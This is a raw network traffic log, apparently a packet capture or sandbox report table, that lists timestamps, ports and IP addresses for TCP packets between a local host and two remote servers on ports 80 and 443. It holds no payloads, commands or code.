Sep 27, 2024 01:38:22.626189947 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626209974 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.626223087 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626230001 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.626259089 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626307964 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.626310110 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626344919 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626383066 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626388073 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.626416922 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626450062 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626483917 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626499891 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.628335953 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.628511906 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.628896952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.628951073 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.686336040 CEST	49749	443	192.168.2.7	104.21.77.130
Sep 27, 2024 01:38:22.686362028 CEST	443	49749	104.21.77.130	192.168.2.7
Sep 27, 2024 01:38:22.686763048 CEST	443	49749	104.21.77.130	192.168.2.7
Sep 27, 2024 01:38:22.707053900 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.707110882 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.707134962 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.707148075 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.707185030 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.707217932 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.707233906 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.707237005 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.707315922 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.707355976 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.708002090 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708031893 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708055019 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708072901 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708089113 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708106995 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708142996 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.708214998 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708249092 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708277941 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708307981 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708317041 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.708326101 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708343983 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708477020 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.708525896 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708574057 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708595991 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708611965 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708627939 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708658934 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708668947 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.708678007 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708698034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.708795071 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.708940029 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.709067106 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.717869997 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.717974901 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718007088 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718024969 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718064070 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718081951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718096972 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718113899 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718116999 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.718131065 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718148947 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718164921 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718182087 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718219042 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718235970 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718252897 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.718287945 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.718318939 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.736049891 CEST	49749	443	192.168.2.7	104.21.77.130
Sep 27, 2024 01:38:22.745820999 CEST	49749	443	192.168.2.7	104.21.77.130
Sep 27, 2024 01:38:22.745836020 CEST	49749	443	192.168.2.7	104.21.77.130
Sep 27, 2024 01:38:22.745965958 CEST	443	49749	104.21.77.130	192.168.2.7
Sep 27, 2024 01:38:22.767333031 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.797265053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.797293901 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.797310114 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.797324896 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.797339916 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.797355890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.797369957 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.797383070 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.797385931 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.797413111 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.797420025 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.797441006 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.798048019 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798100948 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798115969 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798166037 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798172951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798181057 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798187971 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798261881 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.798275948 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798284054 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798291922 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798454046 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.798499107 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798506021 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798513889 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798528910 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798536062 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798650026 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.798676014 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798685074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798713923 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798721075 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798728943 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.798850060 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.806030989 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806073904 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806107044 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806123972 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806142092 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806159019 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806197882 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806221962 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.806240082 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806252956 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806261063 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.806289911 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806309938 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806330919 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806370020 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806390047 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806400061 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.806422949 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.806422949 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.806489944 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.810244083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.810432911 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.810487032 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.900543928 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.900609016 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.900644064 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.900679111 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.900681973 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.900712967 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.900744915 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.900784016 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.900832891 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.900835991 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.900870085 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.900904894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.900926113 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.900938034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.900971889 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.901022911 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.901072025 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902046919 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902101040 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902113914 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.902149916 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.902151108 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902184963 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902220011 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902237892 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.902273893 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902323961 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902354956 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902373075 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.902388096 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902396917 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.902421951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902472973 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902504921 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902522087 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.902556896 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902607918 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902614117 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.902642965 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902657032 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.902678013 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902714014 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902726889 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.902748108 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902781010 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902812958 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.902818918 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902848959 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.902910948 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.904151917 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.904203892 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.904216051 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.904252052 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.904395103 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.904627085 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.904659033 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.904691935 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.904711008 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.904772997 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.904822111 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.904854059 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.904866934 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.904887915 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.904921055 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.904932976 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.904953957 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.904974937 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.904987097 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.905020952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.905035019 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.905054092 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.905086994 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.905097961 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.954797029 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.996433973 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.996473074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.996496916 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.996512890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.996526957 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.996546030 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.996550083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.996567011 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.996579885 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.996582031 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.996598959 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.996602058 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.996615887 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.996622086 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.996675968 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.996998072 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997014046 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997030020 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997070074 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.997104883 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997119904 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997134924 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997150898 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997160912 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.997181892 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.997330904 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997347116 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997360945 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997375011 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997385979 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.997392893 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997409105 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997411013 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.997432947 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.997469902 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997646093 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997658968 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.997684002 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.997714996 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.998611927 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.998626947 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.998641968 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.998677015 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.998716116 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.998749018 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.998800993 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.001164913 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001199007 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001233101 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001276016 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.001276016 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.001487970 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001537085 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001570940 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001590014 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.001601934 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001636028 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001667023 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001687050 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.001701117 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001708031 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.001734018 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001766920 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001813889 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.001816034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001851082 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001883030 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001899958 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.001919985 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001931906 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.001950026 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.001995087 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.085835934 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.085895061 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.085932016 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.085968971 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.085988998 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.086021900 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.086035013 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.086148024 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.086163998 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.086190939 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.086208105 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.086224079 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.086224079 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.086240053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.086246014 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.086256981 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.086285114 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.086306095 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.087114096 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087188005 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087202072 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087255001 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087255001 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.087280989 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087297916 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087312937 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087321997 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.087330103 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087342978 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.087347031 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087364912 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087368965 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.087404966 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.087596893 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087613106 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087630987 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087646008 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087673903 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.087713957 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087721109 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.087734938 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087749004 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.087794065 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.088238001 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.088263035 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.088279963 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.088294029 CEST	49743	80	192.168.2.7	147.45.44.104
